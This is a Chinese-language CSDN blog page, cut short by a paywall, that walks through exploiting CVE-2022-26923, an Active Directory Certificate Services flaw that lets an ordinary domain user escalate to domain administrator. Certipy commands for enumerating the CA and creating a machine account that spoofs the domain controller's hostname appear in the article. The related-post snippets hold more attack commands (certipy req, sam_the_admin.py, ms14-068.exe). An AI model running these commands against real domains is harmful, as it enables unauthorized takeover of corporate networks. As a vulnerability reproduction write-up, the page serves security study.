cve-2022-26923漏洞复现+实战+踩坑记录

最新推荐文章于 2024-06-21 13:49:16 发布
最新推荐文章于 2024-06-21 13:49:16 发布
阅读量2.7k 收藏 3
点赞数 1
文章标签: 安全 https web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43139292/article/details/125231369
版权

一、描述

cve-2022-26923域内权限提升漏洞,5月份以前的存在证书服务器的通杀域控管理员权限,危害巨大。
#域控漏洞 #域控证书漏洞

二、利用条件

一个域内普通账号

存在证书服务器

能访问域控和证书服务器那几个端口

三、利用过程(超级重码,步骤有疑问去看原文)

当前有一个域账号,攻击机为自己电脑(挂好代理可访问内网):

1.certipy查找证书服务器主机名和ip

certipy find "XXXXX.com.cn/username:password@域控ip" -debug

在这里插入图片描述

2.修改攻击机hosts

C:\Windows\System32\drivers\etc\hosts

dc的ip dc的域名
ca的ip ca的域名

3.certipy利用域账号创建个机器账号(这个机器账号属性dnsHostName和域控的主机名一样,这也是漏洞点所在):

certipy account create "XXXXX.com.cn/username:password@域控ip" -dc-ip  域控ip -user "随便起一个机器名(如:machinetestcymm)" -dns "域控的主机名(假设为DC.com.cn&#x
最低0.47元/天 解锁文章
实战派
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Active Directory 域服务权限提升漏洞(CVE-2022-26923)
做自己喜欢的事,并将其发挥到极致!
05-17 2786
文章目录声明一、漏洞描述二、影响范围三、Windows Active Directory (AD)四、Active Directory 证书服务五、环境配置六、漏洞复现七、修复方案八、参考链接 声明 本文章仅用于技术学习、安全研究。切勿用于非授权下渗透攻击行为,切记! 一、漏洞描述 Active Directory 域权限提升漏洞 (CVE-2022-26923)允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中
ADCS-CVE-2022-26923域内提权漏洞-域控
问题很多的小明
07-10 390
本文复现了ADCS域内漏洞CVE-2022-26923
内网CVE-2022-26923复现
include_voidmain的博客
05-23 1796
0x01 前言 Active Directory域权限提升漏洞(CVE-2022-26923)允许低权限用户在安装了 Active Directory证书服务(AD CS)服务器角色的默认Active Directory环境中将权限提升到域管理员。 0x02 Active Directory 证书服务 AD CS 是Microsoft 的公钥基础结构 ( PKI ) 实施。由于AD在组织中提供了一定程度的信任,因此它可以用作CA来证明和委托信任。 AD CS用于多种用途,例如加密文件系统、创建和验证数字签名
cve-2022-26923复现——域提权漏洞复现
m0_46317063的博客
04-23 703
cve-2022-26923域提权漏洞复现
第106天:权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞
最新发布
weixin_71529930的博客
06-21 754
certipy req 'ip/域用户名:密码@域控计算机名' -target-ip 域控ip -ca abc-DC1-CA -template User -debug。python3 sam_the_admin.py 域名/'域控主机账号:密码' -dc-ip 域控ip -shell。ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址。只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞。查看ip已经变成了域控机的ip。
Windows域提权漏洞CVE-2022-26923分析与复现
C20220511的博客
06-24 3284
当Windows系统的Active Directory证书服务(CS)在域上运行时,由于机器账号中的dNSHostName属性不具有唯一性,域中普通用户可以将其更改为高权限的域控机器账号属性,然后从Active Directory证书服务中获取域控机器账户的证书,导致域中普通用户权限提升为域管理员权限。这一漏洞最早由安全研究员Oliver Lyak发现并公开分析过程和POC,微软在2022年5月的安全更新中对其进行了修补。...
CVE-2022-26923 AD CS域提权漏洞复现
qq_42077227的博客
12-15 280
CVE-2022-26923 AD CS漏洞复现
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-26923漏洞分析
wangluo12138的博客
02-01 599
CVE-2022-26923漏洞分析
CVE-2022-26923域提权漏洞
m0_46377671的博客
05-24 3132
CVE-2022-26923域提权漏洞 参考链接: http://www.ctfiot.com/40081.html https://tryhackme.com/room/cve202226923 https://www.bilibili.com/video/BV1hL4y1F79y?spm_id_from=333.337.search-card.all.click 1.漏洞背景 Windows Active Directory (AD) 不仅用于身份和访问管理,还提供大量服务来帮助您运行和管理您的组织,其
CVE-2022-26923域权限提升漏洞复现
ordar123的博客
05-27 1097
本文首发于蛇矛实验室:https://mp.weixin.qq.com/s/AuPajld1K7N5alAkgMZNfA 环境搭建 域控 选择一台winserver2016搭建域控服务,这里是winserver2016。选择Active Directory 域服务,其他默认即可。 安装完成之后,提升为域控制器,开始配置域控。 添加新林rangenet.cn,其他默认,然后一步步到安装完成。 ADCS搭建 下面正式开始安装ADCS服务,只需要注意下面截图的内容,其他都是默认。 服务器管理器–>添
Hadoop 任意文件写入-其实感觉并不是任意文件写入【CVE-2022-26612
Armandhe的博客
04-22 3011
Hadoop 任意文件写入-其实感觉并不是任意文件写入【CVE-2022-26612
CVE-2022-30190 漏洞复现
weixin_53884648的博客
11-10 5985
通过exp实现了对微软目前存在的office-word-2016的成功复现
Spring RCE 漏洞 CVE-2022-22965复现分析
m0_61506558的博客
09-19 5532
关于CVE-2022-22965漏洞的环境调试和内容,网上看了一波,感觉有些知识点内容还是必须要了解才能理解该漏洞,为此详细写了下从Spring框架结构分析,环境搭建到漏洞分析调试整体的一个过程理解,在遇到其他类型的漏洞也可以去调试运用。(一)了解Spring框架由于本文主要介绍漏洞原理流程,所以有关框架不会具体展开,会将涉及到的内容进行解释。1、
【vulhub系列】CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Wiofgb的博客
08-28 3023
记录一次CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
2.2CVE-2022-34918漏洞复现技术原理
06-10
由于CVE-2022-34918是一种nftables堆溢出漏洞,需要构造特定的nftables规则才能触发漏洞,因此复现漏洞需要具备一定的技术水平。 具体来说,复现CVE-2022-34918漏洞的步骤如下: 1. 搭建测试环境:需要在一台Linux系统上搭建nftables环境,以及安装一些必要的工具,如gcc、make、gdb等。 2. 构造恶意规则:需要构造一个特定的nftables规则,以触发CVE-2022-34918漏洞。具体来说,可以通过在规则中使用特定的操作符和参数,向nftables传递恶意数据,从而导致堆溢出。 3. 触发漏洞:使用nft命令加载并执行构造好的恶意规则,从而触发CVE-2022-34918漏洞。 4. 利用漏洞:如果漏洞成功触发,可以使用一些调试工具如gdb来进一步分析漏洞,并尝试利用该漏洞执行任意代码或者进行拒绝服务攻击。 需要注意的是,复现CVE-2022-34918漏洞需要具备一定的技术水平,同时需要谨慎操作,以免对测试环境和实际系统造成不必要的影响。建议仅在专业人士的指导下进行相关操作。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值